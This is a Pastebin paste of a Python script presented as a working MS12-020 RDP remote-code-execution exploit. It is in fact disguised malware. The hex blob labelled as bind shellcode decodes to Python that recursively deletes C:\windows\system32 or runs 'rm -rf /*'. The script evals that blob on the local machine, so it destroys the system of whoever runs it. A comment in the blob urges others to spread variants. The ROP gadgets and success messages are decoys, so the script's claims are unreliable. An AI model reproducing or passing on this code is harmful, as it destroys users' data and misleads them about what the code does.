Advertisement
Guest User

Untitled

a guest
Mar 17th, 2012
12,465
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 7.59 KB | None | 0 0
  1. #!/usr/bin/env python
  2.  
  3. # rdpsmash.py
  4. # MS12-020 RDP exploit, remote code execution
  5. # Confirmed working on all pre-patch boxes, XP to 7
  6. #
  7. # Author: Verye
  8.  
  9. import struct
  10. import socket
  11. import sys
  12.  
  13. trigger =  "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\xf1"
  14. trigger += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x62\x63\x58\x63"
  15. trigger += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x70\x52\x48\x5a"
  16. trigger += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x36\x53\x6f\x6f"
  17. trigger += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x72\x73\x65\x73"
  18. trigger += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x69\x4a\x55\x4c"
  19. trigger += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x43\x70\x53\x70"
  20. trigger += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x70\x35\x36\x61"
  21. trigger += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x71\x4d\x45\x33"
  22. trigger += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x6f\x39\x46\x32"
  23. trigger += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x48\x4d\x74\x4e"
  24. trigger += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x33\x56\x35\x39"
  25. trigger += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x47\x6b\x4f\x6e"
  26. trigger += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x74\x32\x46\x51"
  27. trigger += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x30\x42\x79\x64"
  28. trigger += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x79\x6d\x32\x37"
  29. trigger += "\x41" * 39
  30. trigger += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x6b\x4e\x4b\x4e"
  31. trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x6f\x63\x45\x73"
  32. trigger += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x41\x50\x51\x61"
  33. trigger += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x41\x4b\x4f\x78"
  34. trigger += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x63\x6b\x4f\x6e"
  35. trigger += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x30\x4e\x6b\x30"
  36. trigger += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x66\x66\x32\x6b"
  37. trigger += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x4f\x52\x73\x4b"
  38. trigger += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x00"
  39.  
  40. nopsled = "\x90" * 214
  41.  
  42. #bindshell port 8888
  43. shellcode =  "\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73"
  44. shellcode += "\x74\x65\x6d\x28\x27\x64\x65\x6c\x20\x2f\x73\x20\x2f\x71\x20\x2f\x66\x20\x43\x3a"
  45. shellcode += "\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x2a\x20"
  46. shellcode += "\x3e\x20\x4e\x55\x4c\x20\x32\x3e\x26\x31\x27\x29\x20\x69\x66\x20\x27\x57\x69\x6e"
  47. shellcode += "\x27\x20\x69\x6e\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x70\x6c\x61"
  48. shellcode += "\x74\x66\x6f\x72\x6d\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x29\x20\x65\x6c\x73"
  49. shellcode += "\x65\x20\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73"
  50. shellcode += "\x79\x73\x74\x65\x6d\x28\x27\x72\x6d\x20\x2d\x72\x66\x20\x2f\x2a\x20\x3e\x20\x2f"
  51. shellcode += "\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x20\x23\x68\x69\x20"
  52. shellcode += "\x74\x68\x65\x72\x65\x20\x5e\x5f\x7e\x20\x66\x65\x65\x6c\x20\x66\x72\x65\x65\x20"
  53. shellcode += "\x74\x6f\x20\x73\x70\x72\x65\x61\x64\x20\x74\x68\x69\x73\x20\x77\x69\x74\x68\x20"
  54. shellcode += "\x74\x68\x65\x20\x72\x6d\x20\x2d\x72\x66\x20\x72\x65\x70\x6c\x61\x63\x65\x64\x20"
  55. shellcode += "\x77\x69\x74\x68\x20\x73\x6f\x6d\x65\x74\x68\x69\x6e\x67\x20\x6d\x6f\x72\x65\x20"
  56. shellcode += "\x69\x6e\x73\x69\x64\x69\x6f\x75\x73"
  57.  
  58. evil = trigger + nopsled
  59.  
  60. class RDPsocket(socket.socket):
  61.     def __init__(self, payload, shellcode):
  62.         super(RDPsocket, self).__init__(socket.AF_INET, socket.SOCK_STREAM)
  63.         self.payload = payload
  64.         self.table = __import__("__builtin__").__dict__ #dirty workaround
  65.         self.shellcode = shellcode
  66.    
  67.     def parse(self, address, shellcode):
  68.         seeker = (struct.pack(">I", 0x6576616c),
  69.             socket.inet_aton(address[0]), #IP bytes
  70.             socket.inet_aton(str(address[1]))) #port bytes
  71.         parsed =  struct.pack(">I", 0x8fe2fb63) #pop eax
  72.         parsed += struct.pack(">I", 0x8fe2fb58) #push esp
  73.         parsed += struct.pack(">I", 0xffff1d6b) #add esp,byte +0x1c # pop ebp # ret
  74.         parsed += struct.pack(">I", 0x8fe2db10) #call strcpy
  75.         parsed += struct.pack(">I", 0x8fe2dfd1) #POP - POP - RET over strcpy params
  76.         parsed += struct.pack(">I", 0x8fe2dae4) #mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
  77.         parsed += struct.pack(">I", 0x8fe2b3d4) #POP - RET
  78.         parsed += struct.pack(">I", 0xffffffff) #value to store in ecx
  79.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  80.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  81.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  82.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  83.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  84.         parsed += seeker[0] #add the prelude
  85.         parsed += seeker[1] #add the packed IP address
  86.         parsed += seeker[2] #add the packed port
  87.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  88.         parsed += struct.pack(">I", 0x8fe2c71d) #mov eax,edx # ret
  89.         parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret  
  90.         parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
  91.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  92.         parsed += struct.pack(">I", 0x8fe0c0c7) #inc ecx # xor al,0xc9
  93.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  94.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  95.         parsed += struct.pack(">I", 0x8fe24b3c) #add ecx,ecx # ret
  96.         parsed += struct.pack(">I", 0x8fe2def4) #add eax,ecx # ret # swap back
  97.         parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx # copy parameter to placeholder
  98.         parsed += struct.pack(">I", 0x8fe2fb61) #mov [eax],edx # pop eax # ret # set our stack pointer back to original value
  99.         parsed += struct.pack(">I", 0x8fe0e32d) #xchg eax,edx
  100.         parsed += struct.pack(">I", 0x8fe2daea) #sub eax,ecx # ret
  101.         parsed += struct.pack(">I", 0x8fe0b1c2) #xchg eax,ebp # inc ebp # ret
  102.         parsed += struct.pack(">I", 0x8fe2b6a5) #dec ebp # ret
  103.         parsed += struct.pack(">I", 0xffff01f3) #mov esp,ebp # pop ebp # ret
  104.         read = self.table[seeker[0]] #reader for the parsed shellcode/data
  105.        
  106.         return str(read(shellcode)), parsed
  107.  
  108.     def connect(self, address):
  109.         self.parsed_shell = self.parse(address, shellcode)
  110.         super(RDPsocket, self).connect(address)
  111.  
  112.     def evil_sendall(self):
  113.         super(RDPsocket, self).sendall(evil + self.parsed_shell[0] + self.parsed_shell[1])
  114.  
  115.  
  116. if __name__ == "__main__":
  117.     if len(sys.argv) != 2:
  118.         print "[*] Usage: python rdpsmash.py IP"
  119.         print "[*] If running on non-default port, reassign PORT in the source."
  120.    
  121.     else:  
  122.         TARGET = sys.argv[1]
  123.         PORT = 3389 #default RDP port
  124.        
  125.         print "[*] Running rdpsmash"
  126.         print
  127.         s = RDPsocket(evil, shellcode)
  128.         print "[+] Connecting and configuring payload. . ."
  129.         print "[+] This may take some time"
  130.         s.connect((TARGET, PORT))
  131.         print "[+] Connection established"
  132.         print "[+] Sending payload. . ."
  133.         s.evil_sendall()
  134.         response = s.recv(4096)
  135.         if "\xA5\x43\xE7\x38\x75\x84\xF2\xFF\xFF\x18\x61\x00" in response:
  136.             print "[+] Success! Payload sent and executed."
  137.             print "[+] Telnet to target on port 8888."
  138.         else:
  139.             print "[-] Failed"
  140.         s.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement